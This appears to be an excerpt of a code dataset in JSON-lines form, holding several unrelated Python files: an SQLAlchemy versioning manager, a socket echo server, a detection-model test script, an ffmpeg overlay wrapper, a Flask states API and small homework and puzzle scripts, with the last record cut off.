\"\"\"\n for cls in self.pending_classes:\n if not self.option(cls, 'versioning'):\n continue\n\n inherited_table = None\n for class_ in self.tables:\n if (issubclass(cls, class_) and\n cls.__table__ == class_.__table__):\n inherited_table = self.tables[class_]\n break\n\n builder = TableBuilder(\n self,\n cls.__table__,\n model=cls\n )\n if inherited_table is not None:\n self.tables[class_] = builder(inherited_table)\n else:\n table = builder()\n self.tables[cls] = table\n\n def closest_matching_table(self, 
model):\n        \"\"\"\n        Returns the closest matching table from the generated tables dictionary\n        for given model. First tries to fetch an exact match for given model.\n        If no table was found then tries to match given model as a subclass.\n\n        :param model: SQLAlchemy declarative model class.\n        \"\"\"\n        if model in self.tables:\n            return self.tables[model]\n        for cls in self.tables:\n            if issubclass(model, cls):\n                return self.tables[cls]\n\n    def build_models(self):\n        \"\"\"\n        Build declarative history models based on classes that were collected\n        during class instrumentation process.\n        \"\"\"\n        if self.pending_classes:\n            cls = self.pending_classes[0]\n            self.declarative_base = declarative_base(cls)\n            self.transaction_log_cls = self.create_transaction_log()\n            self.transaction_changes_cls = self.create_transaction_changes()\n            self.transaction_meta_cls = self.create_transaction_meta()\n\n        for cls in self.pending_classes:\n            if not self.option(cls, 'versioning'):\n                continue\n\n            table = self.closest_matching_table(cls)\n            if table is not None:\n                builder = ModelBuilder(self, cls)\n                builder(\n                    table,\n                    self.transaction_log_cls,\n                    self.transaction_changes_cls\n                )\n\n    def build_relationships(self, history_classes):\n        \"\"\"\n        Builds relationships for all history classes.\n\n        :param history_classes: list of generated history classes\n        \"\"\"\n        for cls in history_classes:\n            if not self.option(cls, 'versioning'):\n                continue\n\n            for prop in cls.__mapper__.iterate_properties:\n                if prop.key == 'versions':\n                    continue\n                builder = RelationshipBuilder(self, cls, prop)\n                builder()\n\n    def is_excluded_column(self, model, column):\n        \"\"\"\n        Returns whether or not given column of given model is excluded from\n        the associated history model.\n\n        :param model: SQLAlchemy declarative model object.\n        :param column: SQLAlchemy Column object.\n        \"\"\"\n        if column.name in self.option(model, 'include'):\n            return False\n        return (\n            column.name in self.option(model, 'exclude')\n            or\n            is_auto_assigned_date_column(column)\n            or\n            isinstance(column.type, TSVectorType)\n        )\n\n    def option(self, model, name):\n        \"\"\"\n        Returns the option value for given model. If the option is not found\n        on the given model, falls back to the default values of this manager\n        object. If the option is not found on this manager object either, this\n        method throws a KeyError.\n\n        :param model: SQLAlchemy declarative object\n        :param name: name of the versioning option\n        \"\"\"\n        try:\n            return model.__versioned__[name]\n        except (AttributeError, KeyError):\n            return self.options[name]\n\n    def instrument_versioned_classes(self, mapper, cls):\n        \"\"\"\n        Collects all versioned classes and adds them into pending_classes list.\n\n        :param mapper: SQLAlchemy mapper object\n        :param cls: SQLAlchemy declarative class\n        \"\"\"\n        if not self.options['versioning']:\n            return\n\n        if hasattr(cls, '__versioned__'):\n            if (not cls.__versioned__.get('class')\n                    and cls not in self.pending_classes):\n                self.pending_classes.append(cls)\n                self.metadata = cls.metadata\n\n    def apply_class_configuration_listeners(self, mapper):\n        \"\"\"\n        Applies class configuration listeners for given mapper.\n\n        The listeners work in two phases:\n\n        1. Class instrumentation phase\n            The first listener listens to the class instrumentation event and\n            handles the collecting of versioned models and adds them to\n            the pending_classes list.\n        2. 
After class configuration phase\n            The second listener listens to the after-configuration event and\n            handles the actual history model generation based on the list that\n            was collected during the class instrumentation phase.\n\n        :param mapper:\n            SQLAlchemy mapper to apply the class configuration listeners to\n        \"\"\"\n        sa.event.listen(\n            mapper, 'instrument_class', self.instrument_versioned_classes\n        )\n        sa.event.listen(\n            mapper, 'after_configured', self.configure_versioned_classes\n        )\n\n    def configure_versioned_classes(self):\n        \"\"\"\n        Configures all versioned classes that were collected during\n        instrumentation process. The configuration has 5 steps:\n\n        1. Build tables for history models.\n        2. Build the actual history model declarative classes.\n        3. Build relationships between these models.\n        4. Empty pending_classes list so that consecutive mapper configuration\n           does not create multiple history classes.\n        5. Assign all versioned attributes to use active history.\n        \"\"\"\n        if not self.options['versioning']:\n            return\n\n        self.build_tables()\n        self.build_models()\n\n        # Create copy of all pending versioned classes so that we can inspect\n        # them later when creating relationships.\n        pending_copy = copy(self.pending_classes)\n        self.pending_classes = []\n        self.build_relationships(pending_copy)\n\n        for cls in pending_copy:\n            # set the \"active_history\" flag\n            for prop in cls.__mapper__.iterate_properties:\n                getattr(cls, prop.key).impl.active_history = True\n","sub_path":"sqlalchemy_continuum/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":13636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"547214030","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nimport sys\nimport socket\n# create a server socket\nserver = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\nserver.bind(('192.168.31.59',33333)) # bind the port to listen on\nserver.listen(5) # start listening; allow a backlog of five queued connections\nwhile True:# conn is the connection instance the server creates for an incoming client\n    conn,addr = server.accept() # wait for a connection; gets awkward with several clients; accept() actually returns two values\n    print(conn,addr)\n    while True:\n        data = conn.recv(1024) # receive data\n        print('receive:',data.decode()) # print the received data\n        conn.send(data.upper()) # then send the data back\n    
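# note: the inner 'while True' loop above never breaks, so this close() is\n    # only reached if recv/send raises (e.g. after the client disconnects)\n    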
conn.close()","sub_path":"SysInfo/socketTest.py","file_name":"socketTest.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"271780659","text":"import os, sys\n\nimport torch\nimport numpy as np\nimport pickle\nimport cv2\nfrom collections import OrderedDict\n\nfrom torch.cuda.amp import autocast, GradScaler\n\nfrom tqdm import tqdm\nimport datetime\nimport torch.distributed as dist\nfrom torch.utils.data import DataLoader\nfrom torch.nn.parallel import DistributedDataParallel\nfrom torch.utils.data.distributed import DistributedSampler\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import confusion_matrix\n\nimport opts\nimport utils\nimport inputs\nimport models\nfrom metrics.metrics import evaluate\n\n# TODO: Make Inference.py for no label-case\n\n\nclass Testor(object):\n def __init__(self, cfgs):\n\n save_dict = OrderedDict()\n save_dict[\"fold\"] = cfgs[\"fold\"]\n if cfgs[\"memo\"] is not None:\n save_dict[\"memo\"] = cfgs[\"memo\"] # 1,2,3\n\n specific_dir = [\"{}-{}\".format(key, save_dict[key]) for key in save_dict.keys()]\n\n cfgs[\"save_dir\"] = os.path.join(\n cfgs[\"save_dir\"],\n cfgs[\"model\"][\"meta\"],\n cfgs[\"model\"][\"inputs\"][\"label\"],\n \"_\".join(specific_dir),\n )\n\n # cfgs[\"save_dir\"] = os.path.join(cfgs[\"save_dir\"], \"_\".join(specific_dir))\n os.makedirs(cfgs[\"save_dir\"], exist_ok=True)\n\n self.cfgs = cfgs\n self.cfgs_test = cfgs[\"model\"][\"test\"]\n\n self.tb_writer = utils.get_writer(self.cfgs)\n self.txt_logger = utils.get_logger(self.cfgs)\n\n self.txt_logger.write(\"\\n\\n----test.py----\")\n self.txt_logger.write(\"\\n{}\".format(datetime.datetime.now()))\n self.txt_logger.write(\"\\n\\nSave Directory: \\n{}\".format(self.cfgs[\"save_dir\"]))\n self.txt_logger.write(\"\\n\\nConfigs: \\n{}\\n\".format(self.cfgs))\n\n ####### MODEL\n # NOTE: No Multiple GPU Support for Test\n model = models.get_model(self.cfgs)\n self.device = torch.device(\"cuda:{}\".format(self.cfgs[\"local_rank\"]))\n self.model = model.to(self.device)\n\n def do_test(self):\n\n with open(os.path.join(self.cfgs[\"save_dir\"], \"tot_val_record.pkl\"), \"rb\") as f:\n tot_val_record = pickle.load(f)\n best_record = tot_val_record[\"best\"]\n best_epoch = best_record[\"epoch\"]\n best_model_dir = os.path.join(\n self.cfgs[\"save_dir\"], \"epoch_{}.pt\".format(best_epoch)\n )\n checkpoint = torch.load(best_model_dir)\n self.model.load_state_dict(checkpoint[\"model\"], strict=True)\n self.txt_logger.write(\"\\n Load model dir: {}\".format(best_model_dir))\n self.txt_logger.write(\n \"\\n\" + str({k: v for k, v in best_record.items() if k != \"viz\"})\n )\n\n self.test_csvs = inputs.get_dataset(self.cfgs, mode=\"test\").csv_files\n self.txt_logger.write(\"\\n\\nCSVS: \" + str(self.test_csvs))\n\n header_columns = [\"# pos\", \"# neg\", \"# lesions\", \"# tp\", \"# fp\"]\n header_columns += [\"les sens\", \"les prec\", \"les fppi\", \"les f1\"]\n header_columns += [\"img AUC\", \"img sens\", \"img spec\"]\n\n self.txt_logger.write(\"\\n\\n\")\n self.txt_logger.log_header(header_columns)\n\n for specific_csv in self.test_csvs:\n self.test_specific_csv(specific_csv)\n\n def genActivationMapGrayScale(self, output, saveimg, min_threshold=0.0001):\n dtype = np.uint8\n _, thr = cv2.threshold(output, min_threshold, 255, 0)\n thr = thr.astype(dtype)\n contours, _ = cv2.findContours(thr, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)\n font_size = 0.0005 * (output.shape[0] + 
output.shape[1]) / 2\n thick_size = int(9 * font_size)\n thick_size_2 = int(thick_size / 2)\n # print(font_size, thick_size)\n for cnt in contours:\n M = cv2.moments(cnt)\n x, y, w, h = cv2.boundingRect(cnt)\n max_p = -1\n for i in range(x, x + w):\n for j in range(y, y + h):\n if max_p < output[j][i]:\n max_p = output[j][i]\n cX = int(M[\"m10\"] / (M[\"m00\"] + 1e-4))\n cY = int(M[\"m01\"] / (M[\"m00\"] + 1e-4))\n cv2.drawContours(saveimg, [cnt], 0, (255, 255, 255, 255), thick_size)\n cv2.drawContours(saveimg, [cnt], 0, (0, 0, 0, 255), thick_size_2)\n text_x = int(cX - 30 * font_size)\n text_y = int(cY + h / 2 + 45 * font_size)\n cv2.putText(\n saveimg,\n str(int(round(100 * max_p))) + \"%\",\n (text_x, text_y),\n 0,\n font_size,\n (255, 255, 255, 255),\n thick_size,\n )\n cv2.putText(\n saveimg,\n str(int(round(100 * max_p))) + \"%\",\n (text_x, text_y),\n 0,\n font_size,\n (0, 0, 0, 255),\n thick_size_2,\n )\n\n return saveimg\n\n # FIXME:\n def save_image(self, fp, img, pred, gt, wrong_type=\"fp\"):\n\n num_classes = pred.shape[0]\n pred[pred < 0.1] = 0\n gt = (gt > 0.5).astype(np.uint8) # For soft-label case\n\n csv_name = fp.split(\"png_1024/\")[1].split(\"/\")[0]\n fp = fp.split(\"png_1024/\")[1].replace(\"/\", \"-\")\n img_dir_name = \"images_\" + wrong_type\n\n if img.shape[1] != 1024:\n img = cv2.resize(img, (1024, 1024))\n pred_temp = np.zeros((num_classes, 1024, 1024))\n gt_temp = np.zeros((num_classes, 1024, 1024))\n for c in range(num_classes):\n pred_temp[c, :, :] = cv2.resize(pred[c, :, :], (1024, 1024))\n gt_temp[c, :, :] = cv2.resize(gt[c, :, :], (1024, 1024))\n pred = pred_temp\n gt = gt_temp\n\n # png_dir = os.path.join(self.cfgs[\"save_dir\"], img_dir_name, fp)\n png_dir = os.path.join(self.cfgs[\"save_dir\"], csv_name, img_dir_name, fp)\n os.makedirs(os.path.dirname(png_dir), exist_ok=True)\n\n img *= 255\n cv2.imwrite(png_dir, img)\n\n img_mod = np.dstack([img, np.ones((1024, 1024)) * 255.0])\n img_mod = img_mod.astype(np.uint8)\n\n for c in range(num_classes):\n cv2.imwrite(\n png_dir.replace(\".png\", \"_{}_gt.png\".format(c)), gt[c, :, :] * 255\n )\n\n pred_img = self.genActivationMapGrayScale(pred[c, :, :], img_mod)\n cv2.imwrite(\n png_dir.replace(\".png\", \"_{}_pred.png\".format(c)),\n pred_img,\n )\n\n def test_specific_csv(self, specific_csv):\n ####### DATA\n test_dataset = inputs.get_dataset(\n self.cfgs,\n mode=\"test\",\n specific_csv=specific_csv,\n )\n\n # csv_name = specific_csv.split(\"/\")[-1].split(\".csv\")[0]\n test_logs = [\n len(test_dataset.abnormal_meta_df),\n len(test_dataset.normal_meta_df),\n ]\n\n test_sampler = None\n self.test_loader = DataLoader(\n dataset=test_dataset,\n batch_size=self.cfgs[\"batch_size\"],\n num_workers=self.cfgs[\"num_workers\"],\n pin_memory=True,\n drop_last=False,\n collate_fn=inputs.get_collater(),\n sampler=test_sampler,\n )\n\n ####### Init test result\n nc = self.cfgs[\"model\"][\"inputs\"][\"num_classes\"]\n npth = len(self.cfgs[\"model\"][\"test\"][\"prob_ths\"])\n\n det_gt_nums_tot = 0 # np.zeros((npth, nc))\n det_tp_nums_tot = 0 # np.array([0] * nc)\n det_fp_nums_tot = 0 # np.array([0] * nc)\n det_pred_nums_tot = 0 # np.array([0] * nc)\n nums_tot = 0\n # losses_tot = 0\n\n cls_pred_tot = []\n cls_gt_tot = []\n\n self.model.eval() # batchnorm uses moving mean/variance instead of mini-batch mean/variance\n with torch.no_grad():\n for data in tqdm(self.test_loader, disable=True):\n img = data[\"img\"].permute(0, 3, 1, 2).to(self.device)\n logits = self.model(img, mode=\"test\")\n # loss = 
opts.calc_loss(self.cfgs, self.device, data, logit)\n\n # losses_tot += loss * len(data[\"fp\"])\n nums_tot += len(data[\"fp\"])\n\n det_anns = data[\"bbox\"].numpy()\n\n viz_bi = 0\n for bi in range(len(data[\"fp\"])):\n bi_det_preds = logits[\"preds\"][bi].detach().cpu().numpy()\n if len(bi_det_preds) == 0: # No pred bbox\n bi_det_preds = np.ones((1, 6)) * -1\n bi_cls_pred = 0\n else:\n bi_det_preds[:, -1] = 1 / (1 + np.exp(-1 * bi_det_preds[:, -1]))\n bi_cls_pred = np.max(bi_det_preds[:, -1])\n\n bi_det_ann = det_anns[bi]\n (\n bi_det_gt_num,\n bi_det_pred_num,\n bi_det_tp_num,\n bi_det_fp_num,\n ) = evaluate(self.cfgs, bi_det_preds, bi_det_ann)\n\n # FIXME: remove .item() if multi-label case\n det_gt_nums_tot += bi_det_gt_num.item()\n det_tp_nums_tot += bi_det_tp_num.item()\n # correct_nums_tot += correct_num\n det_pred_nums_tot += bi_det_pred_num.item()\n det_fp_nums_tot += bi_det_fp_num.item()\n\n cls_pred_tot.append(bi_cls_pred)\n cls_gt_tot.append(int(bi_det_ann[0][-1] + 1))\n\n # # for Visualization - abnormal\n\n do_save = True\n wrong_type = \"\"\n if self.cfgs_test[\"save_only_wrong\"]:\n if bi_det_gt_num > 0:\n if bi_det_tp_num == bi_det_gt_num:\n do_save = False\n else:\n wrong_type = \"fn\"\n\n else:\n if bi_det_fp_num == 0:\n do_save = False\n else:\n wrong_type = \"fp\"\n\n if do_save:\n nc = self.cfgs.model.inputs.num_classes\n isz = self.cfgs.model.inputs.image_size\n\n bi_det_preds_viz = logits[\"preds\"][bi].detach().cpu().numpy()\n if len(bi_det_preds_viz) != 0: # No pred bbox\n bi_det_preds_viz[:, -1] = 1 / (\n 1 + np.exp(-1 * bi_det_preds_viz[:, -1])\n )\n else:\n bi_det_preds_viz = np.ones((1, 6)) * -1\n\n bi_det_anns_viz = data[\"bbox\"][bi].detach().cpu().numpy()\n\n bi_det_preds_viz_temp = np.zeros((nc, isz, isz))\n for (x0, y0, x1, y1, c, s) in bi_det_preds_viz:\n if c == -1:\n continue\n else:\n bi_det_preds_viz_temp[\n int(c), int(y0) : int(y1), int(x0) : int(x1)\n ] = s\n\n bi_det_anns_viz_temp = np.zeros((nc, isz, isz))\n for (x0, y0, x1, y1, c) in bi_det_anns_viz:\n if c == -1:\n continue\n else:\n bi_det_anns_viz_temp[\n int(c), int(y0) : int(y1), int(x0) : int(x1)\n ] = 1\n\n self.save_image(\n data[\"fp\"][bi],\n data[\"img\"][bi].numpy(),\n bi_det_preds_viz_temp,\n bi_det_anns_viz_temp,\n wrong_type,\n )\n\n #####################################\n\n cls_pred_tot = np.array(cls_pred_tot)\n cls_gt_tot = np.array(cls_gt_tot)\n\n det_pc = det_tp_nums_tot / (det_pred_nums_tot + 1e-5)\n det_rc = det_tp_nums_tot / (det_gt_nums_tot + 1e-5)\n det_fppi = det_fp_nums_tot / nums_tot + 1e-5\n det_f1 = 2 * det_pc * det_rc / (det_pc + det_rc + 1e-5)\n\n try:\n cls_auc = roc_auc_score(cls_gt_tot, cls_pred_tot)\n except Exception as e:\n print(e)\n cls_auc = \"None\"\n\n if (cls_gt_tot == 0).all() and (cls_pred_tot == 0).all():\n cls_sens = \"None\"\n cls_spec = 1\n else:\n tn, fp, fn, tp = confusion_matrix(cls_gt_tot, cls_pred_tot > 0.5).ravel()\n cls_sens = tp / (tp + fn + 1e-5)\n cls_spec = tn / (tn + fp + 1e-5)\n\n test_logs += [str(det_gt_nums_tot), str(det_tp_nums_tot), str(det_fp_nums_tot)]\n test_logs += [det_rc, det_pc, det_fppi, det_f1]\n test_logs += [cls_auc, cls_sens, cls_spec]\n\n self.txt_logger.log_result(test_logs, txt_write=True)\n self.txt_logger.write(\"\\n\")\n","sub_path":"mkdet/scripts/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":13097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"462308127","text":"#!/usr/bin/env python\n\"\"\"\nIntroduces ffmpeg overlays\n\neg: 
./013-layered.py data/cows-big.flv data/nintendo-big.mp4 data/nintendo-small.mp4 --output layered.avi\n\"\"\"\nimport argparse \t# http://docs.python.org/2/library/argparse.html#module-argparse\nimport subprocess\n\n\ndef main():\n\n\tparser = argparse.ArgumentParser(description='stacks some videos')\n\tparser.add_argument('--output', type=str, help='the output video', default='layered.avi')\n\tparser.add_argument('videos', type=str, nargs=3, help='Three videos to stack')\n\targs = parser.parse_args()\n\n\tfilters = '[0:v][1:v]overlay=20:20[firstTwo];[firstTwo][2:v]overlay=40:40;amix=inputs=3'\n\n\t#\thttp://www.ffmpeg.org/ffmpeg-filters.html#overlay-1\n\t#\tmain_w, overlay_w, main_h, overlay_h\n\tcmd = 'ffmpeg -i {0} -i {1} -i {2} -filter_complex \"{3}\" {4}'.format(args.videos[0], args.videos[1], args.videos[2], filters, args.output)\n\tsubprocess.call(cmd, shell=True)\n\n\nif __name__ == '__main__':\n\tmain()\n\n\n","sub_path":"013-layered.py","file_name":"013-layered.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"119152385","text":"import math\r\n\r\ndef counting(N):\r\n    seen = [0] * 10\r\n    number = 0\r\n    cur = N\r\n    while True:\r\n        org = cur\r\n        while cur > 0:\r\n            digit = cur % 10\r\n            if seen[digit] == 0:\r\n                seen[digit] = 1\r\n                number = number+1\r\n            cur = cur // 10  # floor division keeps cur an int (plain / would break digit extraction under Python 3)\r\n        if number == 10:\r\n            return org\r\n        cur = org+N\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    input = \"A-large\"\r\n    f = open(input + \".in\")\r\n    output = open(input + \".out\", \"w\")\r\n    cases = int(f.readline())\r\n    print(cases)\r\n    for i in range(cases):\r\n        N = int(f.readline())\r\n        if N == 0:\r\n            output.write(\"Case #\" + str(i+1)+ \": INSOMNIA\\n\")\r\n        else:\r\n            output.write(\"Case #\" + str(i+1)+ \": \" + str(counting(N))+\"\\n\")\r\n    f.close()\r\n    output.close()","sub_path":"codes/CodeJamCrawler/16_0_1_neat/16_0_1_Bino_countingsheep.py","file_name":"16_0_1_Bino_countingsheep.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"147291379","text":"from pylab import *\nrcParams.update({'font.size': 48, 'text.usetex': True})\n\nf = open('DOSCAR')\nef = float(f.readlines()[5].split()[3])\nf.close()\n\ndos = genfromtxt('DOSCAR', skip_header=6)\n\nel = -10\neh = 10\n\nxh = max(dos[(dos[:,0] < eh) & (dos[:,0] > el),1])\nxh *= 1.5\n\nf=figure(figsize=(8,12))\nplot(dos[:,1],dos[:,0]-ef)\naxhline(0,color='k',linewidth=2)\naxvline(0,color='k',linewidth=1)\nylim(el, eh)\nxlim(0,xh)\nxlabel('edos')\nylabel(\"Energy (eV)\")\n#savefig('edos_mote2.png', bbox_inches='tight', dpi=200)\ntight_layout()\nshow()\n","sub_path":"electron-dos.py","file_name":"electron-dos.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"96839242","text":"#!/usr/bin/python3\n\"\"\"\nmodule to create a new view for State objects that\nhandles all default RESTFul API actions\n\n\"\"\"\n\nfrom api.v1.views import app_views\nfrom flask import Flask\nfrom flask import jsonify\nfrom models.state import State\nfrom models import storage\nfrom flask import request\nfrom flask import abort\n\n\n@app_views.route('/states', strict_slashes=False)\ndef retrive_states():\n    \"\"\"Retrieves the list of all State objects\"\"\"\n    obj_list = []\n    obj_dict = storage.all(State)\n    for value in obj_dict.values():\n        obj_list.append(State.to_dict(value))\n    
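# (sketch note) storage.all(State) returns every stored State object; each is serialized with to_dict() before the list is jsonify-d below.\n    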
return (jsonify(obj_list))\n\n\n@app_views.route('/states/<state_id>', strict_slashes=False)\ndef retrive_states_by_id(state_id):\n    \"\"\"Retrieves a State object\"\"\"\n    all_states = storage.all(State)\n    for state_obj in all_states.values():\n        if state_id == state_obj.id:\n            return (jsonify(state_obj.to_dict()))\n    abort(404)\n\n\n@app_views.route(\n    '/states/<state_id>',\n    strict_slashes=False,\n    methods=['DELETE']\n    )\ndef delete_states_by_id(state_id):\n    \"\"\"Deletes a State object\"\"\"\n    all_states = storage.all(State)\n    for state_obj in all_states.values():\n        if state_id == state_obj.id:\n            state_obj.delete()\n            storage.save()\n            return ({}), 200\n    abort(404)\n\n\n@app_views.route('/states', strict_slashes=False, methods=['POST'])\ndef create_states():\n    \"\"\"Creates a State\"\"\"\n    if not (request.json):\n        abort(400, 'Not a JSON')\n    json_data = request.get_json()\n    if ('name' not in json_data.keys()):\n        abort(400, 'Missing name')\n    else:\n        new_state = State()\n        new_state.name = json_data['name']\n        new_state.save()\n    return (jsonify(State.to_dict(new_state)), 201)\n\n\n@app_views.route('/states/<state_id>', strict_slashes=False, methods=['PUT'])\ndef update_states(state_id):\n    \"\"\"Updates a State object\"\"\"\n    all_states = storage.all(State)\n    for state_obj in all_states.values():\n        if state_id == state_obj.id:\n            if not (request.json):\n                abort(400, 'Not a JSON')\n            json_data = request.get_json()\n            for k, v in json_data.items():\n                if k in ['updated_at', 'created_at', 'id']:  # skip immutable keys (the original misspelled these as 'update_at'/'create_at', so they were silently overwritable)\n                    continue\n                else:\n                    setattr(state_obj, k, v)\n            state_obj.save()\n            return (jsonify(State.to_dict(state_obj)), 200)\n    abort(404)\n","sub_path":"api/v1/views/states.py","file_name":"states.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"464594354","text":"\nlista = [\n    \"Anna\",\"Maria\",\"Krystyna\",\"Barbara\",\"Teresa\",\"Elżbieta\",\"Zofia\",\"Ewa\",\n    \"Jadwiga\",\"Sylwia\",\"Halina\",\"Danuta\",\"Małgorzata\",\"Gosia\",\"Helena\",\"Grażyna\",\n    \"Bożena\",\"Stanisława\",\"Jolanta\",\"Jola\",\"Urszula\",\"Wanda\",\"Ula\",\"Ala\",\n    \"Alicja\",\"Dorota\",\"Agnieszka\",\"Beata\",\"Katarzyna\",\"Joanna\",\"Asia\",\"Renata\",\n    \"Iwona\",\"Aleksandra\",\"Ola\",\"Genowefa\",\"Hanna\",\"Alina\",\"Józefa\",\"Monika\",\n    \"Monia\",\"Marta\",\"Martyna\",\"Marzena\",\"Izabela\",\"Iza\",\"Emila\",\"Agata\",\n    \"Edyta\",\"Aniela\",\"Wioletta\",\"Wiola\",\"Justyna\",\"Aga\",\"Zuzanna\",\"Zuza\",\n    \"Natalia\",\"Wiktoria\",\"Karolina\",\"Róża\",\"Ilona\",\"Julia\",\"Anita\",\"Ewelina\",\n    \"Magda\",\"Kamila\",\"Paulina\",\"Patrycja\",\"Eliza\",\"Michalina\",\"Adamia\",\"Janina\",\n    \"Honorata\",\"Bernarda\",\"Bernadetta\",\"Faustyna\",\"Fiona\",\"Violetta\",\"Viola\",\"Kasia\",\n    \"Ania\",\"Ela\",\"Irena\",\"Celina\",\"Felicja\",\"Frnciszka\",\"Olga\",\"Zosia\",\n    \"Izabella\",\n]\n# TODO: I'll rewrite this with threads, I promise\ndef correct_name(name):\n    if name.endswith(\"a\"):\n        for buff_name in lista:\n            if buff_name == name:\n                return True\n        return False\n    else:\n        return False  # (fix: the original mixed tabs and spaces here, which raises TabError on Python 3)","sub_path":"game/names.py","file_name":"names.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"217163673","text":"# ------------------------------------------------------------------------------\n# Project : Homework 2\n# Author : Connor Wilding\n# Date : 04/16/2019\n#\n# File : hw2.py\n# Version : 0.1\n# Description : Create a Python program that processes dates. 
All dates in\n# the program are represented by (Month, Day, Year) tuples,\n# each item in the tuple is an integer.\n# ------------------------------------------------------------------------------\nimport fileinput\nimport sys\nfrom calendar import monthrange\nfrom datetime import date\nfrom os import path\n\nclass BadFileFormat(Exception):\n \"\"\"Base class for exceptions in this module.\"\"\"\n pass\n\nclass EmptyFile(BadFileFormat):\n \"\"\"Raised when an empty file is being used.\"\"\"\n\n def __str__(self):\n return 'The file is empty'\n\nclass MissingInteger(BadFileFormat):\n \"\"\"Raised when a date entry is missing a value.\n\n Attributes:\n file -- Name of the file being parsed.\n line -- the line number with missing information.\n \"\"\"\n\n def __init__(self, file, line):\n self.file = file\n self.line = line\n\n def __str__(self):\n return ' Line: %s File: %s \\t Missing Value' % (self.line, self.file)\n\nclass ImproperDate(Exception):\n\n def __init__(self, date):\n self.month = date[0]\n self.day = date[1]\n self.year = date[2]\n\n def __str__(self):\n return 'invalid date: %i-%i-%i' % (self.month, self.day, self.year)\n\n\n#####################################################################\n# Reads a file (the name of the file is stored in the parameter\n# filename) consisting of dates and returns a list of date tuples.\n# Each line in the file represents a single date and consists of\n# three integers separated by spaces. The order of the items in\n# the list must match the order of the file.\n#\n# Parameters : string filename.\n# Returns : list of tuples.\n# Throws : FileNotFoundError, BadFileFormat, ImproperDate\ndef createDateList(filename) -> list:\n # Check if the file is empty.\n if not path.getsize(filename):\n raise EmptyFile()\n\n # Process file\n with fileinput.input(filename) as file:\n date_list = []\n for line in file:\n date_entry = list(map(int, line.rsplit()))\n\n # Check that each line has 3 integers\n if len(date_entry) < 3:\n raise MissingInteger(filename, fileinput.lineno())\n\n # Check date\n if date_entry[2] < 1800 or not checkDate(date_entry[2],\n date_entry[0],\n date_entry[1]):\n raise ImproperDate(date_entry)\n\n # Date checks out, add to list\n date_list.append(date_entry)\n\n return date_list\n\n#####################################################################\n# Checks date by calling datetime.date. Accounts for leap years and\n# the ensures the year is greater than 1800.\n#\n# Parameters : int year, int month, int day\n# Returns : bool\ndef checkDate(year, month, day) -> bool:\n valid_date = True\n try:\n date(year, month, day)\n except ValueError:\n valid_date = False\n\n return valid_date\n\n#####################################################################\n# genFinalDates(year)\n# Takes a year and yields the final date of each month of\n# that year. You may assume the year is 1800 or greater.\n# Iterable function.\n#\n# Parameters : int year\n# Returns : tuple representing the month, last day, and year\ndef genFinalDates(year) -> tuple:\n month = 1\n while month <= 12:\n days_in_month = (month, monthrange(year, month)[1], year)\n yield days_in_month\n month += 1\n\n# 1. 
Get the name of an input file from the command line.\n# Do not prompt the user for a file name.\nfileName = sys.argv[1]\ndateList = []\n\n# 2, 3\ntry:\n    dateList = createDateList(fileName)\nexcept BadFileFormat as e:\n    print(e.__class__.__name__ + ': ' + e.__str__())\n    sys.exit(1)\nexcept ImproperDate as e:\n    print(e.__class__.__name__ + ': ' + e.__str__())\n    sys.exit(1)\nexcept FileNotFoundError as e:\n    print(e.__class__.__name__ + ': ' + str(e))\n    sys.exit(1)\n\n# 4. Using a for loop that iterates over the iterable function\n# genFinalDates that prints each date tuple. Call genFinalDates\n# with the year of the first date in dateList.\nfor date in genFinalDates(dateList[0][2]):\n    print(date)\n\n# 5. Use a for loop that iterates over the iterable function\n# genFinalDates that adds up the number of days in that year.\n# Call genFinalDates with the year of the first date in\n# dateList. Print the final result (which should be 366 for\n# leap years and 365 otherwise).\nttl_days = 0\nfor date in genFinalDates(dateList[0][2]):\n    ttl_days += date[1]\n\nprint(ttl_days, end='\\n\\n')\n\n# 6. Using a single call to max, find the date that occurs latest.\n# To accomplish this, you will need to set the parameters\n# appropriately - see sorted documentation.\nprint(max(([m, d, y] for m, d, y in dateList), key=lambda d: (d[2], d[0], d[1])))  # key compares year, then month, then day (a bare max() compared month-first)\nprint()\n# d[0]: Month, d[1]: Day, d[2]: Year\n\n# 7. Using a single call to sorted, print the dates in ascending\n# order.\nprint(sorted(dateList, key=lambda d: (d[2], d[0], d[1])))\nprint()\n\n# 8. Using a single list comprehension that uses the dates from\n# dateList, create a list that just contains the years of the\n# dates. Print list.\nlist_years = [date[2] for date in dateList]\nprint(list_years)\nprint()\n\n# 9. Create a list monthStr that contains the twelve month\n# abbreviations: [\"Jan\", \"Feb\", \"Mar\",...,\"Dec\"]\nmonthStr = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep',\n            'Oct', 'Nov', 'Dec']\n\n# 10. Using a single list comprehension that uses the dates from\n# dateList, create a list of date strings such as \"Jul 15, 2003\".\n# You may refer to monthStr in the list comprehension.\n# Print list.\n# test = [str(monthStr[x - 1]) + ' ' + str(day) + ', ' + str(year) for x, day,\n# year in dateList]\ndate_str = ['%s %i, %i' % (monthStr[month - 1], day, year) for month, day, year\n            in 